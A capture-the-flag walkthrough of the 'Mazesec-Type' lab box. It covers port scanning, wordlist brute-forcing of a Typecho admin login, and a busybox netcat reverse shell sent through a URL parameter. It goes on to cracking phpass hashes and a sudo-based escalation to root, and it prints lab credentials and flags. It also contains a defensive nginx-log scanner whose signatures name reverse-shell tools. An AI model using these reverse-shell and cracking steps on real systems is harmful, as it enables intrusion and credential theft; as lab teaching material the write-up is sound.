Mazesec_Type

Box Overview

  • Box writeup: Mazesec-Type
  • QQ group: 660930334
  • Difficulty: Medium

1. Information Gathering

1.1 Host Discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-25 15:32 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00066s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00056s latency).
MAC Address: 08:00:27:92:0B:4D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.75
Host is up (0.00094s latency).
MAC Address: 08:00:27:1E:9E:E3 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 8.47 seconds

Target IP: 192.168.2.75

1.2 Port Scanning

1.2.1 Full port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.75
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-25 15:37 +0800
Nmap scan report for 192.168.2.75
Host is up (0.00028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:1E:9E:E3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 43.02 seconds

Open ports: 22, 80

1.2.2 Service and version scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.75
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-25 15:38 +0800
Nmap scan report for 192.168.2.75
Host is up (0.0011s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0 (protocol 2.0)
80/tcp open http nginx
|_http-generator: Typecho 1.3.0
|_http-title: type.dsz
MAC Address: 08:00:27:1E:9E:E3 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.42 seconds

1.2.3 UDP scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.75
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-25 15:38 +0800
Nmap scan report for 192.168.2.75
Host is up (0.00085s latency).
All 100 scanned ports on 192.168.2.75 are in ignored states.
Not shown: 57 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response)
MAC Address: 08:00:27:1E:9E:E3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 55.49 seconds

2. Web Penetration

2.1 Port 80

Browsing to port 80 reveals the domain name type.dsz; add it to the hosts file.

2.2 Directory Scan

┌──(root㉿kali)-[~/miaosec]
└─# dirsearch -u http://type.dsz
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/miaosec/reports/http_type.dsz/_26-02-25_15-46-04.txt

Target: http://type.dsz/

....
[15:46:20] 301 - 162B - /admin -> http://type.dsz/admin/
[15:46:21] 302 - 0B - /admin/ -> http://type.dsz/admin/login.php?referer=http%3A%2F%2Ftype.dsz%2Fadmin%2F
[15:46:21] 302 - 0B - /admin/index.php -> http://type.dsz/admin/login.php?referer=http%3A%2F%2Ftype.dsz%2Fadmin%2Findex.php
[15:46:21] 200 - 5KB - /admin/login.php
[15:46:38] 200 - 0B - /config.inc.php
[15:46:45] 301 - 0B - /feed -> http://type.dsz/index.php/feed/
[15:46:51] 301 - 162B - /install -> http://type.dsz/install/
[15:46:51] 302 - 0B - /install.php -> http://type.dsz/
[15:46:51] 302 - 0B - /install.php?profile=default -> http://type.dsz/
[15:46:51] 403 - 548B - /install/
[15:46:53] 200 - 15KB - /LICENSE.txt
[15:47:23] 301 - 162B - /usr -> http://type.dsz/usr/
[15:47:23] 403 - 548B - /usr/
[15:47:23] 403 - 548B - /var/
[15:47:23] 301 - 162B - /var -> http://type.dsz/var/

Task Completed

Visiting /admin/login.php requires a username and password.

2.3 Information Disclosure

A hint on the page tells us to use cewl.

  • Tip: CeWL (Custom Word List generator) is a Ruby program that spiders a given URL to a specified depth and returns a list of words that password crackers such as John the Ripper, Medusa and WFuzz can use. CeWL also has an associated command-line application, FAB, which uses the same metadata-extraction techniques to build author/creator lists from already downloaded files.

Spider the site to build a wordlist:

┌──(root㉿kali)-[~/miaosec]
└─# cewl http://type.dsz -w dict.txt
CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

Brute-forcing the login with this wordlist eventually yields a valid account: sburro:DevNotes

A string found in the drafts looks like it may be the admin user's password.

Logging in with admin:2DbYCYpXwvV9kKwO succeeds.

3. Getting a Shell

Edit the theme under Appearance.

The reverse shell connects back:

http://192.168.2.75/index.php?pass=busybox%20nc%20192.168.2.4%204444%20-e%20/bin/sh
┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.75] 41077
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
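The request above is exactly what the web server's access log retains, which is where a defender would look for it. As an added example (not part of the original write-up), this Python script parses nginx combined-format log lines (constructed samples, one mimicking the request above), URL-decodes each query parameter and flags values that read like a shell command line; the signature list and function names are my own.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed nginx access-log lines (combined format). The third one mimics the
# request used above; the fourth is benign text that happens to contain "nc".
SAMPLE_LOG = """\
192.168.2.4 - - [25/Feb/2026:15:46:20 +0800] "GET /admin/login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.2.4 - - [25/Feb/2026:16:01:02 +0800] "GET /index.php/feed/ HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
192.168.2.4 - - [25/Feb/2026:16:05:41 +0800] "GET /index.php?pass=busybox%20nc%20192.168.2.4%204444%20-e%20/bin/sh HTTP/1.1" 200 0 "-" "curl/8.5.0"
192.168.2.4 - - [25/Feb/2026:16:06:10 +0800] "GET /index.php?search=nc+and+more HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each signature is a list of patterns that must all match the decoded value:
# a network tool name plus evidence of a shell being attached or a host/port target.
SHELL_SIGNATURES = [
    [r"\b(nc|ncat|netcat|busybox|socat)\b", r"-e\s*/bin/(ba)?sh|\b\d{1,3}(\.\d{1,3}){3}\s+\d{2,5}\b"],
    [r"\bbash\s+-i\b", r"/dev/tcp/"],
]


def suspicious_params(path):
    """Return (name, decoded value) pairs whose value matches a shell signature."""
    hits = []
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        if any(all(re.search(p, value) for p in sig) for sig in SHELL_SIGNATURES):
            hits.append((name, value))
    return hits


def scan_log(text):
    """Parse each log line and emit one alert per suspicious query parameter."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in suspicious_params(m["path"]):
            alerts.append({"ip": m["ip"], "ts": m["ts"], "param": name, "command": value})
    return alerts
```

Only the decoded `pass` parameter trips the rule; the benign `search=nc+and+more` request does not, because a tool name alone is not treated as evidence.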

Upgrade to a stable shell:

/usr/bin/script -qc /bin/bash /dev/null
# press Ctrl+Z to suspend the shell
stty raw -echo; fg
# press Enter
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

4. Privilege Escalation

4.1 Obtaining the plugugly account

Read config.inc.php:

cat config.inc.php
<?php
// site root path
define('__TYPECHO_ROOT_DIR__', dirname(__FILE__));

// plugin directory (relative path)
define('__TYPECHO_PLUGIN_DIR__', '/usr/plugins');

// theme directory (relative path)
define('__TYPECHO_THEME_DIR__', '/usr/themes');

// admin directory (relative path)
define('__TYPECHO_ADMIN_DIR__', '/admin/');

// register autoload
require_once __TYPECHO_ROOT_DIR__ . '/var/Typecho/Common.php';

// init
\Typecho\Common::init();

// config db
$db = new \Typecho\Db('Pdo_SQLite', 'typecho_');
$db->addServer(array (
'file' => '/data/database/typecho.db',
), \Typecho\Db::READ | \Typecho\Db::WRITE);
\Typecho\Db::set($db);

The database file is /data/database/typecho.db.

Copy it to the local machine and inspect it:

┌──(root㉿kali)-[/tmp]
└─# sqlite3 typecho.db
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .show
echo: off
eqp: off
explain: auto
headers: off
mode: list
nullvalue: ""
output: stdout
colseparator: "|"
rowseparator: "\n"
stats: off
width:
filename: typecho.db
sqlite> .tables
typecho_comments typecho_metas typecho_users
typecho_contents typecho_options
typecho_fields typecho_relationships
sqlite> select * from typecho_users;
1|admin|$P$B/xZAkZ342fLS1sEQwQfsXTVKiBnVG/|admin@type.dsz|http://type.dsz/|admin|1771773701|1772094602|1771815254|administrator|64f0e6e34396f985205ac19ef1c71e23
2|sburro|$P$BfS2sY4Vz6sHjC52095jVAFOjMNyuy1|sburro@type.dsz||sburro|1771774529|1774257141|1772093510|contributor|5884754808cdbe5ad69eeaa4e42c3f18
3|plugugly|$P$BuyKfLj9xZ0iLez6SomJNOLGx.7g.U/|plugugly@type.dsz||plugugly|1771812079|0|0|subscriber|

Crack the hash $P$BuyKfLj9xZ0iLez6SomJNOLGx.7g.U/ with john:

┌──(root㉿kali)-[/tmp]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
2boobies (?)
1g 0:00:00:04 DONE (2026-03-23 17:26) 0.2109g/s 20901p/s 20901c/s 20901C/s Dominic1..10031985
Use the "--show --format=phpass" options to display all of the cracked passwords reliably

The password is recovered and we get a shell as plugugly:

┌──(root㉿kali)-[/tmp]
└─# ssh plugugly@192.168.2.75
Type:~$ id
uid=1000(plugugly) gid=1000(plugugly) groups=1000(plugugly)

4.2 Obtaining root

Check sudo -l:

Type:~$ sudo -l
Matching Defaults entries for plugugly on Type:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XAUTHORITY

Runas and Command-specific defaults for plugugly:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User plugugly may run the following commands on Type:
(ALL) NOPASSWD: /root/typer.py

Try running it:

Type:~$ sudo /root/typer.py -h
qt.qpa.xcb: could not connect to display
qt.qpa.plugin: From 6.5.0, xcb-cursor0 or libxcb-cursor0 is needed to load the Qt xcb platform plugin.
qt.qpa.plugin: Could not load the Qt platform plugin "xcb" in "" even though it was found.
This application failed to start because no Qt platform plugin could be initialized. Reinstalling the application may fix this problem.

Available platform plugins are: linuxfb, vkkhrdisplay, minimal, wayland-egl, minimalegl, xcb, vnc, offscreen, wayland, eglfs.

Aborted

The error says no graphical display is available.

So forward the display over SSH:

┌──(root㉿kali)-[~]
└─# ssh -X plugugly@192.168.2.75
plugugly@192.168.2.75's password:
(ASCII-art "welcome" login banner)

/usr/bin/xauth: file /home/plugugly/.Xauthority does not exist
Type:~$ ls -la
total 20
drwxr-sr-x 2 plugugly plugugly 4096 Mar 23 17:34 .
drwxr-xr-x 3 root root 4096 Feb 22 23:25 ..
-rw------- 1 plugugly plugugly 50 Mar 23 17:34 .Xauthority
lrwxrwxrwx 1 root plugugly 9 Feb 23 10:43 .ash_history -> /dev/null
-rw-r--r-- 1 root plugugly 111 Feb 23 10:42 .hint
-rw-r--r-- 1 root plugugly 44 Feb 22 23:25 user.txt
Type:~$ cat .X
cat: can't open '.X': No such file or directory
Type:~$ cat .Xauthority
Type10MIT-MAGIC-COOKIE-1<binary cookie bytes>Type:~$
Type:~$ sudo DISPLAY=$DISPLAY XAUTHORITY=/home/plugugly/.Xauthority /root/typer.py

The script runs, and a root shell is obtained:

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.75] 37745
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

5. Flags

cat /root/root.txt /home/plugugly/user.txt
flag{root-e0d46f8ca8c65edb6b7d46daeafebe16}
flag{user-f1315ee82308853cc1a9402f2cfa6d1c}

Mazesec_Type
http://miao-sec.github.io/Maze-sec/Mazesec-Type/
Author: Miao
Published: February 25, 2026
License: BY-MIAO